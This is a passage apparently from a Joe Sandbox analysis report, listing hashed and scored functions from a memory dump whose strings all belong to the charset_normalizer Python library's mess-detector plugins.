                                                                                                                                                                                                                • Opcode ID: 98918f0986896f26525c7bd9e5b43f4031bd6749c4d76523467727f76d4c2467
                                                                                                                                                                                                                • Instruction ID: dd8d4023b9a837d3309d79f59b14e6258d409a3c2d084027895f53c0bb10a43c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98918f0986896f26525c7bd9e5b43f4031bd6749c4d76523467727f76d4c2467
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5411272A08B8286E718CF69E84036973B1FB48BC8F544135CA6C87768EF7DE595C342
                                                                                                                                                                                                                Function 00007FF8E7147E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.ArchaicUpperLowerPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-353558827
                                                                                                                                                                                                                • Opcode ID: d9e477cc0f5dbe889ee029430d6b8f0b420a3cfa5d140793ed0a56d7501aa99d
                                                                                                                                                                                                                • Instruction ID: dad274a97d1dda650bbba7b79a67655d95aa7722cb3610e672d2e20b385d31d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9e477cc0f5dbe889ee029430d6b8f0b420a3cfa5d140793ed0a56d7501aa99d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84314432A08B82C5E7448F69E84036973A5FB48BC8F540535CA6C87369EF7DE894C342
                                                                                                                                                                                                                Function 00007FF8E7144AB0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.TooManySymbolOrPunctuationPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-3280324660
                                                                                                                                                                                                                • Opcode ID: a1ddc10de017addce63480acb8cb0cb49846706b3ca5f678430c59beec134696
                                                                                                                                                                                                                • Instruction ID: b05aa36df7c5d9fa2a5af997900716a3385cd2903f739d6d0ec99d640eadadcc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1ddc10de017addce63480acb8cb0cb49846706b3ca5f678430c59beec134696
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A313672A08B8285EB44CFA9E84036973A5FB48BC8F540435CA6C87768EF7DE595C342
                                                                                                                                                                                                                Function 00007FF8E7145E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.SuspiciousDuplicateAccentPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-1506521901
                                                                                                                                                                                                                • Opcode ID: c9011ee015d9b478a68b666d2386e0bc45b2be7c5bf24e43dd3277610430b050
                                                                                                                                                                                                                • Instruction ID: 741f4b8e5d5be7a625607925dc1f44a8f83ed129ffc40e97d59c94630a370bf1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9011ee015d9b478a68b666d2386e0bc45b2be7c5bf24e43dd3277610430b050
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4314931A18B8285EB08CF59E84036D63A1FF48BC8F980531CA6C97764EF7DE550D342
                                                                                                                                                                                                                Function 00007FF8E7146560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.SuspiciousRange$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-880397153
                                                                                                                                                                                                                • Opcode ID: 49407b564c236b4001e082ae6d16e11313c9b7c79a02ae8e4e4803c904df55db
                                                                                                                                                                                                                • Instruction ID: a56fb16995510b2662ca1a0d099cd1d6b688a363928c008af525b84e8cdd657b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49407b564c236b4001e082ae6d16e11313c9b7c79a02ae8e4e4803c904df55db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D312731A08B8285EB48CFA9E84036D63B1FB48BC8F940531CA6C87768EF7DE555C342
                                                                                                                                                                                                                Function 00007FF8E7145A00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.UnprintablePlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-116036081
                                                                                                                                                                                                                • Opcode ID: 571f9f9e96768ffb2ac53c4efc93ddbf52cbfab833ec0306282c52c0bf4d27d3
                                                                                                                                                                                                                • Instruction ID: 80ba45e224dacce76500bb41d37b689562928f51bb3af1663d049294e0acd298
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 571f9f9e96768ffb2ac53c4efc93ddbf52cbfab833ec0306282c52c0bf4d27d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD312832A08B8281EB44CF69E84136D63B1FB48BC8F944531DA6C87768EF7DE555D342
                                                                                                                                                                                                                Function 00007FF8E7148A10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.ArabicIsolatedFormPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-1141011871
                                                                                                                                                                                                                • Opcode ID: b59ea239b0ded2da1d7d86f123c67e001364e70b8c495ebd1fe9a254676c74a7
                                                                                                                                                                                                                • Instruction ID: 467e16f98dc164d75a540787a803fb1aa0c933983e61e160efc58ffb60bfa785
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b59ea239b0ded2da1d7d86f123c67e001364e70b8c495ebd1fe9a254676c74a7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41312972A09B8285EB44CF69E84036D63B1FB48BC8F540531DA6C87764EF7DE555C341
                                                                                                                                                                                                                Function 00007FF8E7145450 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.TooManyAccentuatedPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-2999409259
                                                                                                                                                                                                                • Opcode ID: 46a8908cafe4df30933cc1bf2f0944172b9d1b0b9ac90932bbe1890628880787
                                                                                                                                                                                                                • Instruction ID: c94d6e0f3d4586c7bdbca55944264f1c62fc61a8564c3e48e528c65264db6fd4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a8908cafe4df30933cc1bf2f0944172b9d1b0b9ac90932bbe1890628880787
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C313831A08B8285EB448F69E84036D63B1FB48BC8F940531DA6C8B768EF7DE555C741
                                                                                                                                                                                                                Function 00007FF8E7149150 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SubtypeType_
                                                                                                                                                                                                                • String ID: charset_normalizer.md.MessDetectorPlugin$eligible$str
                                                                                                                                                                                                                • API String ID: 2891779845-1291782451
                                                                                                                                                                                                                • Opcode ID: 7f0862f8ed2a2bf7f8ea4440bfcb9bd23f6d9e60511077b2f04859b75fbf1be2
                                                                                                                                                                                                                • Instruction ID: aaf0b89263f0c5acc68be5d2e42f1991a58f7b4c20a3c8009fc09297656a16c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f0862f8ed2a2bf7f8ea4440bfcb9bd23f6d9e60511077b2f04859b75fbf1be2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD118161B08786C5EA289BD5D8953BD63A1BF45FD0F884035DD2D473A4EE2CE455C302
                                                                                                                                                                                                                Function 00007FF8E7148870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_String
                                                                                                                                                                                                                • String ID: 'ArchaicUpperLowerPlugin' object attribute '_last_alpha_seen' cannot be deleted$str or None
                                                                                                                                                                                                                • API String ID: 1259552197-1607602726
                                                                                                                                                                                                                • Opcode ID: 2eb1423d3a8d026875b47d3e487d8fbdb754b2b35a34fb420c45883b89527626
                                                                                                                                                                                                                • Instruction ID: e646bfab94d3bee18827208b245dfc86d29c500179216ffd84d0a5f0cfb82e3e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2eb1423d3a8d026875b47d3e487d8fbdb754b2b35a34fb420c45883b89527626
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F115172B08B46C6EF598B99E49537C63A1FB88BD4F484131DA2D47798EE3CE4908702
                                                                                                                                                                                                                Function 00007FF8E7146450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_String
                                                                                                                                                                                                                • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_last_latin_character' cannot be deleted$str or None
                                                                                                                                                                                                                • API String ID: 1259552197-4111674009
                                                                                                                                                                                                                • Opcode ID: 45422d08dff3ba37862566774811d1c873494940e91693ae83718888786eb3b7
                                                                                                                                                                                                                • Instruction ID: 25f2fd6f34422b1f60ae9f7b9a13a56c3911983ad03699befb6e87d14073224f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45422d08dff3ba37862566774811d1c873494940e91693ae83718888786eb3b7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18117F72B08B46C6EE588B99E49037C23B0EF48BD8F484131DA2D47799EE2CE4908702
                                                                                                                                                                                                                Function 00007FF8E71452B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_String
                                                                                                                                                                                                                • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_last_printable_char' cannot be deleted$str or None
                                                                                                                                                                                                                • API String ID: 1259552197-2331204894
                                                                                                                                                                                                                • Opcode ID: 4a2e56e4c18d021721d1ff58624d4138fa5cae7aafe6a9259ab8a3639d0b6b2d
                                                                                                                                                                                                                • Instruction ID: 3be08eae9cc61073f7a241cc93506d5dd9334fa7c6052a53413039e8aaec7943
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a2e56e4c18d021721d1ff58624d4138fa5cae7aafe6a9259ab8a3639d0b6b2d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B117C72B08B46C6EE488BA9E49033C63A0FB48FD4F884131DA2D4B795EE2CE4509702
                                                                                                                                                                                                                Function 00007FF8E7149280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SubtypeType_
                                                                                                                                                                                                                • String ID: charset_normalizer.md.MessDetectorPlugin$feed$str
                                                                                                                                                                                                                • API String ID: 2891779845-1310269896
                                                                                                                                                                                                                • Opcode ID: 174ffd5a8d4fbd5a7ace33c46627c3910e0e1c50ab3d8efb39f58c9a0e45e4fb
                                                                                                                                                                                                                • Instruction ID: 177f43e34ff18109c8c429a72547a8811d9d340dea7b6f9b69b2e8a2e58382fc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 174ffd5a8d4fbd5a7ace33c46627c3910e0e1c50ab3d8efb39f58c9a0e45e4fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC114FA1A48746C5EB689BA6E8413BD6361BF45BC0F844031DD3D473A4EF2CE855C702
                                                                                                                                                                                                                Function 00007FF8E715281F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                • Opcode ID: 5d81bad33af6d0c6a6d34ccc316adc70e06c6ff90d8471e672fe39720f4c7cf5
                                                                                                                                                                                                                • Instruction ID: c68b86d4b543daace791fb49b33b4f91cd6af18a85a8e8a91165c065651e6c6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d81bad33af6d0c6a6d34ccc316adc70e06c6ff90d8471e672fe39720f4c7cf5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 210156A2E09B83C1F71D4BD5E84233C22A2AF10BE4F444135C92D4B3A0DE3DB4808303
                                                                                                                                                                                                                Function 00007FF8E7152670 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                • Opcode ID: 097e68ef3b6926ae97075bdf610a732ab01175073ea4774d168167745da7d900
                                                                                                                                                                                                                • Instruction ID: af06d7a8de6dca662e622b88f6640ab969c5d1d5a2ea69ac1b685c8d4afc3721
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 097e68ef3b6926ae97075bdf610a732ab01175073ea4774d168167745da7d900
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A0112A6E09B8381FB1D9BD4E8413BD22A2AF40BE1F444134C92E0B7A0DE3DE5859743
                                                                                                                                                                                                                Function 00007FF8E7152CD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                • Opcode ID: 24728f44ecafede275bfe5869a5481c6ada5958cbf93234a040fc8aef190d785
                                                                                                                                                                                                                • Instruction ID: dca47f4f4d354d9031759c632fd55d1a7b09e0db372f149142d157ba48e837e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24728f44ecafede275bfe5869a5481c6ada5958cbf93234a040fc8aef190d785
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF0104A6E09B8281FB0D8BD5E84137C26A2AF40BD5F544035C92E0B6A1EF6DE5859303
                                                                                                                                                                                                                Function 00007FF8E7152B3F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
